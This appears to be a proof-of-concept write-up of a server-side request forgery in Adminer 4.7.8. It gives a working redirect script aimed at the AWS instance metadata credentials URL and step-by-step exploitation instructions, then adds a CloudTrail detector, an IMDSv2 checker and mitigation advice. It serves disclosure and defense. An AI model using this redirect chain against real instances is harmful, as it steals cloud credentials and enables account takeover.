POC process
- On the attacker-controlled machine, start a listener that redirects every request to the credentials URL
```python
#!/usr/bin/env python3

# Usage example:
# ./redirect.py 1337 http://169.254.169.254/latest/meta-data/iam/security-credentials/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("""
    Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit()


class Redirect(BaseHTTPRequestHandler):
    # Answer every GET with a permanent redirect to the URL given on the command line
    def do_GET(self):
        self.send_response(301)
        self.send_header('Location', sys.argv[2])
        self.end_headers()


HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
Install the vulnerable program, for example Adminer v4.7.8:
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  # Unique key of the Deployment instance
  name: adminer-v4.7.8
  namespace: default
spec:
  # 1 Pod should exist at all times.
  replicas: 1
  selector:
    matchLabels:
      app: adminer-v4.7.8
  template:
    metadata:
      labels:
        # Apply this label to pods and default
        # the Deployment label selector to this value
        app: adminer-v4.7.8
      # annotations:
      #   instrumentation.opentelemetry.io/inject-java: 'true'
      #   instrumentation.opentelemetry.io/container-names: "php-app-demo"
    spec:
      containers:
      - name: adminer
        # Run this image
        image: adminer:4.7.8
        # command: ["php", "-S", "[::]:8080", "-t", "/var/www/html"]
        imagePullPolicy: IfNotPresent
        ports:
        - name: http
          containerPort: 8080
          protocol: TCP
        env:
        - name: TEST_AUTOINSTRUMENTATION
          value: test_value
```
Execution testing
- Forward the port for local use:
  ```shell
  kubectl port-forward deploy/adminer-v4.7.8 -n default 8080:8080
  ```
- Log in using the Elasticsearch (beta) system
- Fill in the address and port of the remote Python program: x.x.x.x:1337
- If the instance uses IMDSv1, this should print the role name
- Change the redirect URL of the Python program so that the role name is appended as the suffix
- Press the login button again; this should print the credentials
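What leaks here is a temporary session for the instance's role, and such sessions have a distinctive shape in CloudTrail: the identity is an `AssumedRole` whose session name is the instance id. Any API call from such a session that arrives from an address outside the account's own networks is therefore a strong signal that the credentials left the instance (this is essentially what GuardDuty's `InstanceCredentialExfiltration` findings check). The detection below is an added example and is not part of the original write-up; it assumes CloudTrail records as plain dicts with CloudTrail field names and a hypothetical trusted-CIDR list, and the sample events are constructed.

```python
"""Flag EC2 instance-role credentials used from outside the trusted network.

Added example, not part of the original write-up. Events are dicts with CloudTrail
field names; TRUSTED_NETS and all sample values are assumptions / constructed data.
"""
import ipaddress

# Assumed: the VPC CIDR plus the NAT gateway / elastic IPs the instances egress through.
TRUSTED_NETS = [
    ipaddress.ip_network("10.0.0.0/16"),
    ipaddress.ip_network("198.51.100.7/32"),
]

_NODE_ROLE_ARN = "arn:aws:sts::111122223333:assumed-role/adminer-node-role/i-0123456789abcdef0"
_NODE_IDENTITY = {"type": "AssumedRole",
                  "principalId": "AROAEXAMPLEID:i-0123456789abcdef0",
                  "arn": _NODE_ROLE_ARN}

# Constructed CloudTrail-style events (schema field names, made-up values).
SAMPLE_EVENTS = [
    {   # normal: the node's own role calling from inside the VPC
        "eventTime": "2024-01-01T10:00:00Z", "eventName": "DescribeInstances",
        "sourceIPAddress": "10.0.1.23", "userIdentity": _NODE_IDENTITY},
    {   # suspicious: same instance-role session, but from outside the account's networks
        "eventTime": "2024-01-01T10:05:00Z", "eventName": "ListBuckets",
        "sourceIPAddress": "203.0.113.45", "userIdentity": _NODE_IDENTITY},
    {   # not an instance role: an IAM user working from the internet is expected
        "eventTime": "2024-01-01T10:06:00Z", "eventName": "GetCallerIdentity",
        "sourceIPAddress": "203.0.113.45",
        "userIdentity": {"type": "IAMUser", "principalId": "AIDAEXAMPLEID",
                         "arn": "arn:aws:iam::111122223333:user/alice"}},
    {   # service-originated call: sourceIPAddress is a service DNS name, not an IP
        "eventTime": "2024-01-01T10:07:00Z", "eventName": "CreateSnapshot",
        "sourceIPAddress": "ec2.amazonaws.com", "userIdentity": _NODE_IDENTITY},
]


def instance_role_session(event):
    """Return (role_name, instance_id) for an EC2 instance-profile session, else None.

    Instance-profile sessions are AssumedRole identities whose session name is the
    instance id, so the ARN ends in .../assumed-role/<role>/<i-...>.
    """
    ident = event.get("userIdentity", {})
    if ident.get("type") != "AssumedRole":
        return None
    parts = ident.get("arn", "").split("/")
    if len(parts) != 3 or not parts[2].startswith("i-"):
        return None
    return parts[1], parts[2]


def outside_trusted_nets(source, trusted_nets):
    """True when the source is an IP address that lies in none of the trusted networks."""
    try:
        ip = ipaddress.ip_address(source)
    except ValueError:
        return False  # DNS names such as "ec2.amazonaws.com" mark AWS-service-originated calls
    return not any(ip in net for net in trusted_nets)


def find_exfiltrated_sessions(events, trusted_nets=TRUSTED_NETS):
    """Return one record per API call made by an instance-role session from an untrusted address."""
    hits = []
    for ev in events:
        session = instance_role_session(ev)
        if session and outside_trusted_nets(ev.get("sourceIPAddress", ""), trusted_nets):
            role, instance = session
            hits.append({"eventTime": ev.get("eventTime"), "eventName": ev.get("eventName"),
                         "sourceIPAddress": ev["sourceIPAddress"],
                         "role": role, "instance": instance})
    return hits


if __name__ == "__main__":
    for hit in find_exfiltrated_sessions(SAMPLE_EVENTS):
        print("instance-role credentials used off-network:", hit)
```

On real data the trusted list must include every address the instances legitimately egress through (NAT gateways, elastic IPs, VPN ranges), otherwise ordinary traffic is flagged; calls whose `sourceIPAddress` is a service DNS name are skipped because they are made by AWS on the instance's behalf, not by the leaked keys.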
Use awscli and the credentials
```bash
export AWS_ACCESS_KEY_ID=ASIAEXAMPLEEXAMPLEEE
export AWS_SECRET_ACCESS_KEY=EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLESEXAM
export AWS_SESSION_TOKEN=EXAMPLEEXAMPLEEXAMPLE...<snip>
```
Please upgrade the IMDS to v2
```bash
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
```
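IMDSv2 closes this hole because the session token has to be obtained with a PUT request, which a redirect-following GET cannot issue; the fix is only effective, though, if IMDSv1 is actually turned off (`http-tokens=required`), since by default both versions are served. The checker below is an added example, not part of the original write-up: it performs a token-less GET and the v2 handshake against an endpoint and reports whether v1 is still open. The mock server at the bottom is a constructed stand-in for the two IMDS modes so the check can be exercised off-instance; the token value and path list it serves are made up.

```python
"""Check whether an IMDS endpoint still answers token-less (IMDSv1) requests.

Added example, not part of the original write-up. The checker speaks the real IMDS
protocol (PUT /latest/api/token, then X-aws-ec2-metadata-token on GETs); the mock
server is a constructed stand-in so the check can be tested without an EC2 instance.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKEN_HEADER = "X-aws-ec2-metadata-token"
TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"


def _request(host, port, method, path, headers=None, timeout=2.0):
    """One HTTP exchange without proxies; returns (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(method, path, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    finally:
        conn.close()


def imds_v1_open(host, port=80):
    """True if the metadata tree is served without a session token (IMDSv1 allowed).

    With http-tokens=required the endpoint answers 401 to every token-less request.
    """
    status, _ = _request(host, port, "GET", "/latest/meta-data/")
    return status == 200


def imds_v2_works(host, port=80):
    """True if the v2 handshake succeeds: obtain a token via PUT, then GET with it."""
    status, token = _request(host, port, "PUT", "/latest/api/token", {TTL_HEADER: "21600"})
    if status != 200:
        return False
    status, _ = _request(host, port, "GET", "/latest/meta-data/", {TOKEN_HEADER: token})
    return status == 200


def assess(host="169.254.169.254", port=80):
    """Summarise both checks; the desired state is v1_open=False, v2_ok=True."""
    return {"v1_open": imds_v1_open(host, port), "v2_ok": imds_v2_works(host, port)}


# ---- constructed mock of the two IMDS modes ("optional" = v1+v2, "required" = v2 only) ----
def make_mock_handler(http_tokens):
    class MockIMDS(BaseHTTPRequestHandler):
        TOKEN = "mock-session-token"  # constructed value, not a real IMDS token

        def log_message(self, *args):  # keep test output quiet
            pass

        def _reply(self, status, body=b""):
            self.send_response(status)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_PUT(self):
            if self.path == "/latest/api/token" and TTL_HEADER in self.headers:
                self._reply(200, self.TOKEN.encode())
            else:
                self._reply(400)

        def do_GET(self):
            if http_tokens == "required" and self.headers.get(TOKEN_HEADER) != self.TOKEN:
                self._reply(401)
                return
            self._reply(200, b"iam/\ninstance-id\n")  # constructed listing

    return MockIMDS


def start_mock_imds(http_tokens):
    """Start a mock on 127.0.0.1; returns (port, server). Call server.shutdown() when done."""
    server = HTTPServer(("127.0.0.1", 0), make_mock_handler(http_tokens))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1], server


if __name__ == "__main__":
    import json
    try:
        print(json.dumps(assess()))  # on a hardened instance: {"v1_open": false, "v2_ok": true}
    except OSError as exc:
        print("IMDS endpoint unreachable:", exc)
```

Run on an instance, `assess()` reporting `v1_open: true` means the redirect trick in this write-up still works; the switch is made with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`. For workloads like this Adminer pod that have no business talking to the metadata service at all, a Kubernetes NetworkPolicy denying pod egress to 169.254.169.254/32 (or a pod-level credential mechanism such as IAM roles for service accounts) removes the path entirely, regardless of IMDS version.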